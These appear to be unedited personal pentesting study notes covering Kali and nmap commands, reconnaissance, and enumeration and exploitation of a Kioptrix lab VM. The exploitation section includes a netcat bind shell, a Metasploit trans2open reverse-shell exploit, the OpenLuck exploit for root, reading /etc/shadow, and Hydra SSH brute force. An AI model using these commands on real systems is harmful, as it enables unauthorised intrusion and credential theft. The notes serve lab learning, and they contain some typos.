HOME LAB

Pentest- Hands-on exp.

 PENTESTING NOTES Hands-on exp.

DISCLAIMER:

  • This document contains unedited notes and has not been formally proofread.
  • The information provided in this document is intended to provide a basic understanding of certain technologies.
  • Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
  • Some websites and software may be flagged as malware by antivirus programs.
  • The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
  • The document is not a substitute for professional advice or expert analysis and should not be used as such.
  • The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
  • The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
  • The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
  • The author reserve the right to update or change the information contained in this document at any time without prior notice.

  • Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
  • It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
  • Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
  • It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
  • It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
  • It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

REFERENCES:

  • https://www.linkedin.com/learning/
  • The Cyber mentor Youtube channel 
    • So You Want to Be a Hacker: 2023 Edition- Heath Adams
    • Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
    • Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
    • Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
***********************************************************************

CONTENTS

  • PENTEST PHASE STEPS
  • INTRODUCTION
  • BASIC COMMANDS
    • KALI
    • Nmap Commands
    • Linux commands
  • BEGINNER NETWORK PEN TESTING 
    • Booting Kali
    • Building a script
    • Executing the python file
    • Building script for a scanning  (socket)  - Scanner.py
    • The Five stages of Ethical hacking
    • Reconnaissance
      • Collection of information Gathering 
      • Searching sub domains 
      • Website technologies:
      • BURP suite
      • Nikto
    • Enumeration : Preparation
      • Installing Kiptrix
      • NMAP scan
      • Enumeration : HTTP/HTTPS
        • Now trying to run enumeration using nikto - web vulnerability scanner
        • Dirbuster / gobuster / dirb
      • Enumeration SMB
        • Metasploit Framework
        • SMBCLIENT
      • Enumerating SSH
      • Scanning with Nessus
    • Exploitation
      • Netcat Reverse shell
      • Staged Vs Non staged payloads
      • Gaining Root with metasploit
      • Manual Exploitation 
        • OPENLUCK exploitation 
        • Brute Force Attack
      • Credential Stuffing and Password spraying
    • Pentest Report- revisited 

  • Building vulnerable machine and attack machine
    • HANDS ON EXPERIENCE
      • 01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
      • 02 - VULNERABLE MACHINE:  ACTIVE DIRECTORY
      • 03 - VULNERABLE MACHINE : BLUE

***********************************************************************

PENTEST PHASE STEPS

  1. Planning
    • Obtain written permission
    • Identify rules of engagement
    • Set Goals
    • Finalize management approval
  2. Discovery
    • Scanning and Enumeration
    • Vulnerability analysis
  3. Exploitation or Attack
    • Demonstrate the risk to the organizations 
    • Business impact
    • Gaining access
    • Escalation privileges
    • System browsing
    • Install additional tools
    • Determining extent of the vulnerabilities 
  4. Reporting
*********************************************************************

INTRODUCTION

Pentesting, or penetration testing, is the practice of simulating an attack on a computer system, network, or web application to test its defenses and identify vulnerabilities. There are many resources available to learn pentesting, including online courses, books, and hands-on experience.

Here are some steps you can follow to learn pentesting:

Action Plan

Transitioning to a career in Pentesting may require some additional steps and planning, but it is certainly possible. Here is a table outlining some steps that you can take:
  1. Familiarize yourself with the basics of computer science and networking. This can involve taking online courses or reading books to learn about topics such as data structures, algorithms, and network protocols.
  2. Learn a programming language such as Python or linux commands. These languages are commonly used in pentesting and can be useful for creating custom tools. You can find online tutorials and resources to help you learn these languages.
  3. Get hands-on experience by setting up a lab environment and practicing on vulnerable systems. There are many virtual machine images available online that you can use for this purpose.
  4. Join online communities and forums where you can learn from other pentesters and get feedback on your work.
  5. Consider obtaining a certification in pentesting, such as the Offensive Security Certified Professional (OSCP) or the Certified Ethical Hacker (CEH). These certifications can help demonstrate your knowledge and skills to potential employers.
  6. Look for opportunities to gain practical experience, such as internships or part-time positions, to help you build your resume and network.
  7. Consider seeking out additional education or training, such as a degree in computer science or cybersecurity, to help you stand out in the field.

Hands-on experience

Gaining hands-on experience is an important step in learning about pentesting and becoming proficient in the field. Here are a few ways you can gain hands-on experience:
  • Set up a lab environment using virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer, which you can then use to practice on vulnerable systems.
  • Download and use virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
  • Participate in Capture the Flag (CTF) events and hackathons. These are competitions where teams of participants work to solve challenges and "capture" flags by finding and exploiting vulnerabilities in systems and networks.
  • Seek out internships or part-time positions in the field of cybersecurity. These types of opportunities can provide you with practical experience working on real-world systems and projects.
There are many vulnerable systems that you can download and practice on to gain hands-on experience in pentesting. Here are some steps you can follow to find and download these systems:
  • Search for virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
  • Download and install virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer.
  • Download a vulnerable virtual machine image and import it into your virtualization software.
  • Start the virtual machine and begin practicing on the vulnerable system.

Vulnerable virtual machine images

Here are a few links to sites where you can find vulnerable
virtual machine images:
https://www.vulnhub.com/
Here is the listing few vulnerable virtual machine images and their download links
Metasploitable
A Linux virtual machine designed for testing security tools and demonstrating common vulnerabilities https://sourceforge.net/projects/metasploitable/
Kali Linux
A Linux distribution designed for pentesting and digital forensics https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
VulnHub
A collection of vulnerable virtual machine images for practicing pentesting https://www.vulnhub.com/

Conduct pentesting :- ethical hacking

Here are a few more companies that allow individuals to conduct pentesting, also known as ethical hacking, on their systems as a way to identify vulnerabilities and improve security:
  • HackerOne
    • https://www.hackerone.com/
    • A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
  • Bugcrowd
    • https://www.bugcrowd.com/
    • A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
  • Synack
    • https://www.synack.com/
    • A platform that uses a combination of artificial intelligence and a community of vetted hackers to test the security of systems
  • Cobalt
    • https://cobalt.io/
    • A platform that connects organizations with a global community of cybersecurity researchers who can test their systems and report vulnerabilities
  • HackenProof
    • https://hackenproof.com/
    • A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
  • Tenable
    • https://www.tenable.com/
    • A platform that offers a range of cybersecurity testing services, including vulnerability assessment and penetration testing
  • Intigriti
    • https://www.intigriti.com/
    • A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
  • Zerocopter
    • https://www.zerocopter.com/
    • A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
  • Kaspersky Secure Testing Services
    • https://www.kaspersky.com/secure-testing-services
    • A range of cybersecurity testing services offered by Kaspersky, including vulnerability assessment and penetration testing
  • Veracode
    • https://www.veracode.com/
    • A platform that offers a range of cybersecurity testing services, including application security testing and secure code review
  • Clearview
    • https://www.clearviewinfosec.com/
    • A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
  • BugBountyHQ
    • https://www.bugbountyhq.com/
    • A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
  • Crowdcurity
    • https://www.crowdcurity.com/
    • A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
  • Kudelski Security
    • https://www.kudelskisecurity.com/services/cybersecurity-testing/
    • A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
  • Peerlyst
    • https://www.peerlyst.com/
    • A platform that connects organizations with a community of cybersecurity experts who can test their systems and report vulnerabilities
  • Hacken
    • https://hacken.io/
    • A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
  • SafeHat
    • https://www.safehats.com/
    • A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
  • Alibaba Cloud
    • https://www.alibabacloud.com/security/security-testing
    • A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
  • Bounty Factory
    • https://www.bountyfactory.io/
    • A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
  • Symantec
    • https://www.symantec.com/security-center/services/penetration-testing
    • A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
  • Gurucul
    • https://www.gurucul.com/services/cybersecurity-services/penetration-testing.
    • A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
Here are five websites that offer free tutorial videos for students to learn about pentesting:
  • https://www.cybrary.it/ A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting.
    • A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting
  • Pentester Academy
    • https://www.pentesteracademy.com/
    • A platform that offers a range of online courses in cybersecurity, including a course on pentesting
  • Hackr.io
    • https://hackr.io/
    • A platform that aggregates online courses and tutorials in various fields, including cybersecurity
  • Udemy
    • https://www.udemy.com/
    • An online learning platform that offers a range of courses in various fields, including cybersecurity
  • edX
    • https://www.edx.org/
    • An online learning platform that offers a range of courses in various fields, including cybersecurity

**********************************************************************

BASIC COMMANDS

KALI

  • ─(kali㉿kali)-[~]
└─$ ip a 
  • $ route
  • $ arp -a
  • $ ip n

  • Create files
    • echo
    • cat
    • touch
  • Updating file
    • nano
    • gedit
    • mousepad
  • Service
    • sudo service apache2 start
    • sudo service apache2 stop
  • Start server
    • python3 -m http.server 80
  • Update && Upgrade
    • sudo apt update && upgrade
  • git
    • git clone https://github.com/Dewalt-arch/pimpmykali
  • grep
    • cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
  • Sockets
    • = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # af_inet is ipv and sock.stream is a port

Nmap Commands 

Nmap Tutorial to find Network Vulnerabilities

  • nmap -sS -D 10.1.0.1
-D = decoy  and specifying a dummy ip-address 

Nmap Scripting Engine (NSE)

to check vulnerabilities 
  • sudo nmap --script vuln 

Security Testing: Nmap Security Scanning

  • dig www.google.com  = gives the IP address 
-Pn  No Host discovery  = Nmap skips the host searching process & performs full target scan 
-PS means TCP SYN request
-PA means TCP ACK request
-PU means UDP request 
-PE means ICMP echo request 
-PR means ARP request

  • TCP Scan Types 
-sS    TCP SYN scan ( half open scan / stealthy  scan)
-sT = TCP  connect scan (full open scan)
-sN = TCP  NULL scan
-sF = TCP  FIN scan
-sX = TCP  Xmas scan
-sA = TCP  ACK scan
-sW = TCP window scan
-sM  = TCP maimon scan

-F  flag  does a fast scan 
e.g. nmap  -F 192.168.1.1

Timing template 

-T5  insane 
-T4  aggressive
-T3  Normal
-T2  polite
-T1 sneaky
-T0 paranoid 

-sV  = Service version detection
  • sudo nmap -sV -O -F 10.0.2.4 
E.g. = nmap -T4 -F 192.168.1.*

-A option provide details and inbuilt script of nmap scan
sudo nmap -A -T4 192.168.1.*
  • nmap saving output files
-oN = Human readable text file
-oX = Machine readable file
-oG = Grepable text file
  • -v  = allows to see progress by nmap 
DNS spoofing: 
windows powershell : ipconfig /displaydns

***********************************************************************

How to check a website:

First step to check a website with robots.txt
https://www.google.com/robots.txt

HackThisSite
hackthissite.org
HackThisSite.org, commonly referred to as HT

Page source or inspect element or Ctrl+U

Check for 
- Passwords in comments
Comments
Hidden forms

Developer tools - ctrl+Shift+I

Linux commands

  • Ls
  • Cd
  • Grep
  • Su
  • Pwd
  • Whoami
  • Mv
  • Cp
  • Mkdir
  • Cat

Tools:

Kali Linux
Scanning
  • Nmap
  • Nikto
  • Zenmap
  • Threader3000
  • angry IP 
  • NetCat
  • Hydra
  • Wireshark
  • Dirbuster
  • Burp suite
Exploit
  • metasploit

**********************************************************************

BEGINNER NETWORK PEN TESTING 


Booting Kali

The Cyber mentor Youtube channel
  • Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
  • Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
  • Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)

root@Kali - # pwd

root@Kali - # ls -la

  • Update the internal database

root@Kali - # updatedb

root@Kali - # locate filename.txt 

  • Manual command 

root@Kali -# man ls 

  • Change the file permission to executable

root@Kali - # chmod +x filename.txt

Adding user

root@Kali - # adduser bob

  • Command to identify the root users and other users in the system using etc/passwrd

root@Kali - # cat /etc/passwrd

  • Shadow command: this file contains the hash function for the user which can be used to crack the password of the user. 

root@Kali - # Cat /etc/shadow


Switch user 

root@Kali - #  su username

username@kali - #

Switching back to root

username@kali - # su -

root@Kali


  • Network Commands

root@Kali - # ifconfig

root@Kali - # iwconfig

  • Ping with count command

root@Kali - # ping -c 1 192.168.1.1

  • To find the broadcast id or to capture a flag who has this mac address with the ip address

root@Kali - # arp -a


  • Find open ports and related to

root@Kali - # netstat -ano


root@Kali - # route 

root@Kali - # history 


  • Starting Services

root@Kali - # service apache2 start

root@Kali - # service ssh start

root@Kali - # service postgresql start


root@Kali - # service apache2 stop 

root@Kali - #systemctl enable ssh

root@Kali - # systemctl enable postgresql

root@Kali : ~ /Desktop# ping -c 1 192.168.1.2 > ip.txt

root@Kali : ~ /Desktop# cat ip.txt

Building a script :

  • Just trying to pull or grab the text using grep, cutting using delimiter -d and using space 4 then transforming : as space. 

root@Kali : ~ /Desktop# Cat ip.txt | grep “64 bytes” | cut -d “ “ -f 4 | tr -d “:”

root@Kali : ~ /Desktop# nano ipsweep.sh


  • Python Cheat sheet; 

https://darknetdiaries.com/imgs/Python-CheatSheet.pdf

Creating script

to cpy lines from nano crtl+sht+c and paste in external notepad

(root㉿kali) nano ipsweep.sh


GNU nano 7.2                                    ipsweep.sh

#!/bin/bash

if [ "$1" == "" ]

then

echo "You forgot an ip address"

echo "The Syntax ./ipsweep.sh 192.168.1"

else


for ip in `seq 1 254`; do

ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &

done

fi

********************

  • Executing the python file

  • now running the script 

root㉿kali# ./ipsweep.sh 192.168.1 > iplist.txt


  • doing nmap scan with the obtained ip and using it from the stored file. 

root㉿kali # for ip in $(cat iplist.txt); do nmap -p 80 -T4 $ip & done



root㉿kali #  gedit python101.py

#!/bin/python3

#print string

print("strings and things:")

print('hello world')

print("""hello,this is

a multi line string""")


print('\n') #new line


#math

print('math time')

print(50 + 50) #add

print('\n') #new line


#variable and methods

quote ="All if fun"

print(len(quote))

print(quote.upper)


name ="Health"

age = 29

gpa = 3.9

print(int(age))

print("may name is "+ name + " i  am " + str(age) + " yrs")

print('\n') #new line



#functions

print("some fun")

def who_am_i():

name = "Health"

age = 29

print("may name is "+ name + " i  am " + str(age) + " yrs")


who_am_i()


#adding parameters


def add_one_hundred(num):

print(num + 100)


add_one_hundred(100)


#boolean parameters


#relation and boolean parameters


#conditional statements


print("conditonal para")

def soda(money):

if money >= 2:

return "U have got a soda"


else:

return "No soda"


print(soda(3))

print(soda(1))

print('\n') #new line


#Lists


print("Lists")

movies = ["one","two","three","four"]

print(movies[0])


#Tuples


#looping

print("for loops")

veg = ["cucu","carr","app"]

for x in veg:

print(x)


print("while loops is true")

i = 1

while i < 10:

print(i)

i += 1

********************

Executing the python file

  • Giving write permission

root㉿kali #  chmod +x python101.py

root㉿kali #   python3 python101.py



root㉿kali # - gedit py102.py

#!/bin/python3


#importing

print("importing")


import sys #system functions and parameters


from datetime import datetime

print(datetime.now())


from datetime import datetime as dt #importing with an alias

print(dt.now())


def new_line():

print('\n')


new_line()


#advance strings

print("advance strings")

my_name = "Health"

print(my_name[0]) #first initial


sentence = "this is a sentence"


print(sentence[:4]) #first word


#Dictionaries

print("Dictionaries are with key and value")

********************

Executing the python file

root㉿kali- python3 py102.py


if you want to host a simple server then

root㉿kali-# python3 -m http.server 80


root㉿kali-# install pyftpdlib

Building script for a scanning (socket) - Scanner.py

#!/bin/python3

import sys #allows to enter cmd line arguments

import socket

from datetime import datetime


#define our target


if len(sys.argv) == 2:

target = socket.gethostbyname(sys.argv[1]) #Translate a hostname to IPV4

else:

print("invalid amount of arguments")

print("syntax: python3 scanner.py <ip>")

sys.exit()


#add a pretty banner

print("-" * 50)

print("Scanning target "+target)

print("Time started: "+str(datetime.now()))

print("-" * 50)


try:

for port in range(50,85):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

socket.setdefaulttimeout(1) #is a float

result = s.connect_ex((target,port)) #returns error indicator

print("Checking port {}".format(port))

if result == 0:

print("Port {} is open".format(port))

s.close()


except keyboardInterrupt:

print("\nExiting program.")

sys.exit()


except socket.gaierror:

print("Hostname could not be resolved.")

sys.exit()


except socket.error:

print("couldnt connect to server")

sys.exit()

*****
Executing scanner.py

root㉿kali-# python3 scanner.py 192.168.1.1


******************************

The Five stages of Ethical hacking

  • Reconnaissance
    • Active & passive
  • Scanning & Enumeration
    • Nmap, Nessus, Nikito, etc.
  • Gaining Access
    • exploitation
  • Maintaining Access
  • Covering Tracks

Reconnaissance

Passive

  • Location information
  • Job information
  • Web/ Host
    • Target validation
      • WHOIS, nslookup, dnsrecon
    • Finding subdomains
      • google FU, dig, nmap, sublister, Bluto, crt.sh
    • Fingerprinting
      • nmap, wappalyzer, whatweb, builtwith, netcat
    • Data Breaches
      • haveibeenpwned, breach-prase, weleakinfo

BUG-Crowd programs

  • https://bugcrowd.com/programs
Take a client from the bugcrowd program, for testing and check the scope of testing websites.

  • example : tesla.com

Here are a few places where you can find bug bounty programs:


HackerOne (https://www.hackerone.com/): HackerOne is a platform that connects security researchers with organizations that offer bug bounty programs. Many well-known companies, including Airbnb, Shopify, and Spotify, use HackerOne to run their bug bounty programs.

Bugcrowd (https://www.bugcrowd.com/): Bugcrowd is another platform that connects security researchers with organizations that offer bug bounty programs. Many companies in industries such as finance, healthcare, and technology use Bugcrowd to run their bug bounty programs.

Open Bug Bounty (https://www.openbugbounty.org/): Open Bug Bounty is a non-profit organization that aims to make the internet a safer place by encouraging website owners to run a public bug bounty program. The organization provides a platform for security researchers to report vulnerabilities they find in participating websites.

BountyFactory (https://bountyfactory.io/): BountyFactory is a platform that aggregates bug bounty programs from various companies, making it easy for security researchers to find and participate in programs.

Synack (https://www.synack.com/): Synack is a company that provides managed crowdsourced security testing services to organizations. Security researchers can apply to become part of Synack's "Red Team" and participate in private bug bounty programs for Synack's clients.

Collection of information Gathering

Discovering email address:

https://hunter.io/
https://phonebook.cz/
https://www.voilanorbert.com/
https://clearbit.com/resources/tools/connect

Checking email id are valid

https://tools.emailhippo.com/
https://email-checker.net/

https://github.com/hmaverickadams/breach-parse

Hunting Breached Credential's

https://www.dehashed.com/ - paid version

Dehashed homepage
Deahased home Page


Dehashed- results
Dehashed- results
**************************************

Searching sub domains

  • ─$ sudo apt install sublist3r 
    • sublist3r -d tesla.com

  • https://crt.sh/

    • Searching tesla.com

  • https://github.com/OWASP/Amass

    • The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques.

  • https://github.com/tomnomnom/httprobe

    • Take a list of domains and probe for working http and https servers.

Website technologies:

  • https://builtwith.com/


builtwith
builtwith.com

  • Wappalyzer: 

    • Find out what websites are built with https://www.wappalyzer.com
    • The Wappalyzer APIs provide instant access to website technology stacks, company and contact details, social media profiles, email verification and more

wappalyzer
wappalyzer

  • WhatWeb Usage Example

    • ─$ whatweb tesla.com

https://www.kali.org/tools/theharvester/

  • root㉿kali-# theHarvester -h
  • root㉿kali-# theHarvester -d apple.com -l 500 -b bing

BURP suite

  • Community edition
  • https://portswigger.net/burp/releases/professional-community-2023-1-2requestededition=community&requestedplatform=
  • Setting up Burp suite
    • opening the burpsuite
    • next opening the Firefox, hamburger menu, settings, network settings
    • manual proxy configuration 
    • http proxy : 127.0.0.1 Port:8080
    • same for https proxy & SOCKS host
  • New tab - https://burp/
Burp suite
Burp suite
  • download the CA certificate and save
    • Go to settings- Privacy & Security - click view certificate - import - select the file - click the 2 check boxes and ok
  • Open the Burp suite- Proxy tab - click intercept on. 
    • then open browser - tesla.com 
    • Burp suit/ Proxy Tab - captures 
    • Burp suit/ Target Tab
BURP Suite
Burp suite

Nikto

  •  root@kali:~# nikto -h https://tesla.com

GOOGLE FU

Google-fu (uncountable) (informal) Skill in using search engines (especially Google) to quickly find useful information on the Internet.

Using google to maximize the search results

search query examples 
  • site:tesla.com # here you are searching against the site
  • site:tesla.com -www # removing "WWW"
  • site:tesla.com -www -r  # removing both - "www, ir"
  • site:tesla.com filetype:pdf 

Social Media:

Gather information on people from
  • LinkedIn
  • Twitter 

**************************************

Enumeration : Preparation

Installing Kiptrix

  • Original source
    • https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
  • Modified version
  • https://tcm-sec.com/kioptrix
    • https://drive.google.com/drive/folders/1z923e0icfJADbhgS0Qfaxuez-GJTWvjt
Now importing the image in Virtual box
  • Setting all the virtualbox machine under "NATNETWORK"

Kioptrix vul machine is turned on 

    • Kioptrix_Level_1.

    • https://www.vulnhub.com/entry/kioptrix-level-1-1,22/


Trying to Find the ip address of the kioptrix and kali linux VM's

  • # arp-scan -l

  • ifconfig

Scanning Starts


  • root@kali:~#  netdiscover -r 192.168.1.0/24

netdiscover -r 192.168.1.0/24

  • Getting the kioptrix ip address to perform attack

NMAP scan

To scan all ports "-p-" which take long time based on the domain ranging from 15 minutes to 12 hrs. Doing so will be able to find all the options to find the vulnerabilities.

Step 1: Just to find all the open ports only
  • root@kali:~# nmap -T4 -p- 192.168.202.130

Step 2: Scan for TCP and UDP protocols- suggestion scan for top 1000 ports
  • nmap -sU -T4 -p 192.168.202.130
Step 3: Now find the open ports and then giving the ports to get all details 

Now after getting the open port details 
  • root@kali:~# nmap -A -T4  -p22,80,111,139,443,32768 192.168.202.130
      • Port 22 is open SSH service
      • Port 80 open Apache https 1.3.20
      • Port 139 open netbios-ssn samba
      • Port 443 open ssl/https apache/1.3.20

namp scan



Enumeration : HTTP/HTTPS


Now 192.168.202.130 is executed in the browser

  • A apache test page is displayed as below [Kioptrix vul machine]
    • Now creating report 

      • Take screenshot and provide details

      • For IP address 192.168.202.130

PORT open disclosure







Now clicking on the manual link lead to 404

    • we are able to see the version of apache and server name revealed and the port number all these are internal information which are exposed. 
404 page
Information Disclosure : - 404 page






Now trying to run enumeration using nikto - web vulnerability scanner

  • root@kali:~# Nikto -h  192.168.202.130
  • also try - Nikto -h  http://192.168.202.130


nikto
nikto 


  • able to read the scan report what are the vulnerabilities listed from the scan results
    • anti-clickjacking not present
    • x-xss protection header not defined
    • apache outdated
    • mod_ssl outdated

Dirbuster / gobuster / dirb 

kali ~# dirbuster&

dirbuster
dirbuster

The Dirbuster window opens up

  • Target url http://192.168.202.130:80/
  • File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
  • Select any file - for time being use- directory-list-lowercase-2-3-small.txt
  • File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
  • file extensions are selected based on the base server is on php 
Dirbuster window
Dirbuster window


Once the results are populated and now we are trying to turn local host for burp suite


internal host
internal host








Meanwhile burp site is loading then we are trying to find some more information by checking the source code by right click on the page and select source code. 
  • checking the comments for keys, passwords, hints, dir structure or any other information useful for gaining access in the source code

source code
source code


Now Burp suite is ready and intercept is on to capture the results and sending to repeater. 
Burp suite
Burp suite
Adding the target http://ipaddress to the scope tab

Burp suite - Scope
Burp suite - Scope

Now we can see the information disclosure from Burp suite - Sitemap tab - Raw show the details of the server. 
This was visible from nikto scan as well 

The Pentestion Report: updated as below image


Now results from Dirbuster 
 response code
200 = ok
400 = error or found
300 = redirects 
500 = server errors
Dirbuster result
Dirbuster result
Copy the url and open in the browser : http://192.168.57.134/usage/usage_201911.html
usage_201911 html
usage_201911 html
Same way check each page is revealed and find more information 

Enumeration SMB

Now trying to enumerate SMB on port 139 
we are trying to get vulnerabilities- SMB and its version used in the server. 

Metasploit Framework is started 

kali:~# msfconsole
msf5> search smb
msfconsole
msfconsole search smb
msf5> use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
msf5 auxiliary(scanner/smb/smb_version) > run
Now we are able get the version 
samba 2.2

SMBCLIENT is started

root@kali:~# smbclient -L \\\\192.168.57.134\\
root@kali:~# smbclient  \\\\192.168.57.134\\ADMIN$
smb
root@kali:~# smbclient  \\\\192.168.57.134\\IPC$
smb: \> 
smb: \> help
smb: \> ls
access denied
smb: \> exit
smb

The access denied is seen as dead-end

Enumerating SSH

kali:~# ssh 192.168.57.134 
kali:~# ssh 192.168.57.134 -oKexAlgorithms=+diffie-hellman-group1-sha1
kali:~# ssh 192.168.57.134 -oKexAlgorithms=+diffie-hellman-group1-sha1 -c ases128-cbc
Enumerating SSH

We have not got the password and hence terminating - CTRL + C

Researching potential vulnerabilities 

Pentest Report - Notes
Pentest Report - Notes

researching for "mod_ssl/2.8.4 exploit"

Port 80/443 - Potentially vulnerable as follows
Results received: - 
  • https://www.exploit-db.com/exploits/764
  • https://github.com/heltonWernik/OpenLuck

Apache 1.3.20 vulnerabilities

Results received: - 
  • https://www.exploit-db.com/exploits/19975
  • https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-369927/Apache-Http-Server-1.3.20.html

Samba 2.2.1 vulnerabilities

Port 139 - potential vulnerable to trans2open
Results received: - rapid7 gives a metasploit exploit
  • https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open/
  • Module Options
  • To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
  • msf > use exploit/linux/samba/trans2open
  • msf exploit(trans2open) > show targets
  •     ...targets...
  • msf exploit(trans2open) > set TARGET < target-id >
  • msf exploit(trans2open) > show options
  •     ...show and set options...
  • msf exploit(trans2open) > exploit

Now using Kali we can search the exploit

kali:~# searchsploit samba 2.2

kali:~# searchsploit mod ssl 2

searchsploit

kali:~# searchsploit openssh

kali:~# searchsploit webalizer


Assessment Report 

Use any tool to get the assessment report.
Make sure everyone is able understand the report.
Report must be in Business view and Technical view. 


Assessment Report

Assessment Report 

Scanning with Nessus 

Nessus family, Nessus® Essentials
As part of the Nessus family, Nessus® Essentials (formerly Nessus Home) allows you to scan your environment (up to 16 IP addresses per scanner) with the same high-speed, in-depth assessments and agentless scanning convenience that Nessus subscribers enjoy.

Downloading the package

https://www.tenable.com/products/nessus/nessus-essentials
https://www.tenable.com/downloads/nessus?loginAttempted=true

Now installing the deb package 
─(kali㉿kali)-[~/Downloads]
└─$ sudo dpkg -i Nessus-10.5.0-ubuntu1404_amd64.deb

 - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
 - Then go to https://kali:8834/ to configure your scanner

(kali㉿kali)-[~/Downloads]
└─$ sudo /bin/systemctl start nessusd.service  

https://kali:8834/

registering for nessus essentials and creating admin id
nessus


Create new scan -> Basic network scan 
Give ip address
Discovery : You can change to all port scan or retain common scan
Advance : scan type : default
Save then click launch
starting nessus scan

also try Create new scan -> Advance scan  and try to explore

SCAN results  - analysis 

Now understanding  the nessus scan results.
getting into vulnerabilities  click the settings icon and select ungroup
SCAN results  - analysis
Looking at the critical vulnerabilities.

Exploitation 

Netcat Reverse shell - uses internal n/w

Target machine to Attackbox 

Netcat Bind shell - uses external n/w

Attackbox connected to Target machine
  • From Victim machine 4445 is opened: 
root@kali:~# nc -lvp 4445 -e /bin/bash
  • From attacker machine :  
root@kali:~# nc 192.168.57.139 4445
Connection is established and able to connect to the shell 

Staged Vs Non staged payloads 

Payloads - are exploits 

Gaining Root with metasploit

kali:~# searchsploit samba 2.2
kali:~# msfconsole
msf5>
msf5> search trans2open
msf5 > use 1
msf5 exploit(linux/samba/trans2open) > options

msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.57.139
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > show options
msf5 exploit(linux/samba/trans2open) > show targets

msf5 exploit(linux/samba/trans2open) > exploit

msf5 exploit(linux/samba/trans2open) > ^C # here there no no connection or exploit not working, hence looking for other options
msf5 exploit(linux/samba/trans2open) > options
now there are more payload options displayed by metasploit

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
This is the non staged payload where is he no /slash
For Staged payload there is / after shell 
msf5 exploit(linux/samba/trans2open) > run

It was success and root access is achieved - congrats

Manual Exploitation 

OPENLUCK exploitation 

root@kali:~# git clone https://github.com/heltonWernik/OpenLuck
Install ssl-dev library
root@kali:~# apt-get install libssl-dev
root@kali:~#  gcc -o OpenFuck OpenFuck.c -lcrypto
Running the Exploit
root@kali:~# ./Open

root@kali:~# /OpenFuck 0x6b 192.168.57.134 -c 40


After running the exploit the root privilege is gained - congrats
Now Trying to enumerate from the root using below commands
Arp -a
Route
Sudo -l
Pwd # working directory
Trying to get password hashes 
Cat /etc/shadow
Trying here to find some other connected sub networks using the above commands also.

Brute Force Attack

ssh - brute force attack

 root@kali:~#  hydra -l root -P /usr/wordlists/metasploit/unix_passwords.txt ssh://192.168.157.134:22 -t 4 -V 
Now using metasploit
root@kali:~# msfconsole
msf5> search ssh
msf5> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login)> options
msf5 auxiliary(scanner/ssh/ssh_login)>set username root
msf5 auxiliary(scanner/ssh/ssh_login)>set pass_file /usr/share/worldlists/metaspolit/unix_passwords.txt

msf5 auxiliary(scanner/ssh/ssh_login)> set threads 10
